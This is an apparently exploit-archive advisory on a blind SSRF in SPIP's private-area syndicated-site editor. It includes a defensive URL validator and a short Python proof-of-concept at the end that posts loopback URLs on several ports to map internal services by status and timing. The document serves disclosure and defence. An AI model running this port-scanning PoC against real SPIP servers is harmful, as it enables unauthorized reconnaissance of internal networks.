=============================================================================================================================================
| # Title : SPIP < 4.4.9 Blind SSRF via Syndicated Sites in Private Area                                                                    |
| # Author : indoushka                                                                                                                      |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor : https://www.spip.net/en_rubrique25.html                                                                                        |
=============================================================================================================================================

[+] Summary :

SPIP versions prior to 4.4.9 are vulnerable to a Blind Server-Side Request Forgery (SSRF) in the private administration interface (ecrire/). When an authenticated user edits a syndicated site, the application does not properly validate the url_syndic parameter:

  - The syndication URL is not strictly validated as a legitimate external remote URL.
  - The application accepts arbitrary URLs, including http://127.0.0.1, internal IP ranges (e.g. 10.x.x.x, 192.168.x.x) and attacker-controlled external endpoints.
  - The server then issues a backend HTTP request to the supplied destination.

Because the fetched response is not returned to the attacker, the issue is classified as Blind SSRF: only side channels such as the HTTP status code of the edit request and the time the server takes to answer are observable. That is still enough to enable:

  - Internal port scanning
  - Access to internal services (e.g. databases, cache servers)
  - Interaction with cloud metadata services (if applicable)
  - Network enumeration through timing or behavioral analysis

Exploitation requires a valid private-area session with the right to edit syndicated sites. Importantly, this vulnerability is not mitigated by the SPIP security screen, so that standard protection mechanism does not prevent exploitation.
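For comparison, the check that url_syndic is missing: the block below is an added example written for this page in Python (to match the PoC), not SPIP's own code or its fix. It accepts a syndication URL only if its scheme is http(s) and its host is, or resolves exclusively to, a public address, rejecting loopback, RFC 1918, link-local (which covers 169.254.169.254), IPv4-mapped IPv6 and similar forms. The resolver hook, the hostnames and the addresses in the constructed DNS table are assumptions made so that it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Ranges a syndication fetcher should never contact that the ipaddress
# predicates below do not already flag (Python's is_private list omits the
# RFC 6598 shared space). 169.254.169.254, the usual cloud metadata address,
# is link-local and is caught by is_link_local.
_BLOCKED_NETWORKS = [
    ipaddress.ip_network("100.64.0.0/10"),  # RFC 6598 carrier-grade NAT
    ipaddress.ip_network("fc00::/7"),       # IPv6 unique local addresses
]


def _address_is_internal(addr):
    """True for any address a server-side fetcher must not reach."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # [::ffff:127.0.0.1] is still loopback
    if (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified):
        return True
    return any(addr in net for net in _BLOCKED_NETWORKS)


def system_resolver(hostname):
    """Default resolver: every A/AAAA answer for hostname, as strings.
    getaddrinfo also turns shorthand like '2130706433' or '0x7f000001'
    into 127.0.0.1, so those spellings get checked as addresses too."""
    return sorted({info[4][0] for info in socket.getaddrinfo(hostname, None)})


def is_safe_syndication_url(url, resolver=system_resolver):
    """Accept only http(s) URLs whose host is, or resolves exclusively to,
    a public address. Anything unparsable or unresolvable is rejected."""
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 brackets
        return False
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        literal = ipaddress.ip_address(parts.hostname)
    except ValueError:
        literal = None
    if literal is not None:
        return not _address_is_internal(literal)
    try:
        answers = resolver(parts.hostname)
    except OSError:  # socket.gaierror is an OSError subclass
        return False
    if not answers:
        return False
    # Every answer must be public: a host with one public and one private
    # record can still be steered to the private one at connect time.
    return all(not _address_is_internal(ipaddress.ip_address(a)) for a in answers)


# Constructed DNS table so the example runs offline; the names and
# addresses are invented for illustration, not real hosts.
_FAKE_DNS = {
    "feed.example.org": ["93.184.216.34"],
    "split.example.org": ["93.184.216.34", "10.0.0.5"],
    "metadata": ["169.254.169.254"],
}


def constructed_resolver(hostname):
    try:
        return _FAKE_DNS[hostname]
    except KeyError:
        raise socket.gaierror(f"constructed resolver: unknown host {hostname}")


def demo():
    """Run the check over the kinds of values the advisory describes."""
    samples = [
        "http://feed.example.org/rss.xml",   # genuine external feed
        "http://127.0.0.1:6379/",            # loopback, the PoC's target
        "http://[::ffff:127.0.0.1]:3306/",   # IPv4-mapped loopback
        "http://169.254.169.254/latest/",    # cloud metadata literal
        "http://metadata/",                  # same address via DNS
        "http://192.168.1.10/",              # RFC 1918
        "http://split.example.org/",         # mixed public/private answers
        "ftp://feed.example.org/",           # wrong scheme
        "http://2130706433/",                # decimal loopback: rejected here as
                                             # unresolvable; getaddrinfo maps it
                                             # to 127.0.0.1, rejected as loopback
    ]
    return {u: is_safe_syndication_url(u, resolver=constructed_resolver) for u in samples}


if __name__ == "__main__":
    for url, ok in demo().items():
        print(f"{'allow' if ok else 'reject':6} {url}")
```

Validating at save time is necessary but not sufficient: a hostname that passes the check can be re-resolved to an internal address when the syndication job actually fetches the feed (DNS rebinding), and the remote feed can redirect to an internal URL. The same address check has to be applied to the address the fetcher connects to, and to every redirect target, at fetch time.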
[+] POC :

import time
import requests

# Private-area form for editing a syndicated site; adjust the host to the target.
# Requires an authenticated private-area session (spip_session cookie).
target_url = "http://target-spip.com/ecrire/?exec=site_edit"
session_cookie = {"spip_session": "your_session_id_here"}

ports_to_scan = [21, 22, 80, 443, 3306, 6379]

for port in ports_to_scan:
    payload = {
        "url_syndic": f"http://127.0.0.1:{port}",
        "syndication": "oui",
        "modifier": "Enregistrer",
    }
    started = time.monotonic()
    try:
        response = requests.post(target_url, data=payload, cookies=session_cookie, timeout=30)
        status = response.status_code
    except requests.RequestException as exc:
        status = f"error ({exc.__class__.__name__})"
    elapsed = time.monotonic() - started
    # The fetched content is never returned to us: compare status codes and
    # response delays across ports to tell open ports from closed ones.
    print(f"Checking internal port {port}... Status: {status} ({elapsed:.2f}s)")

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================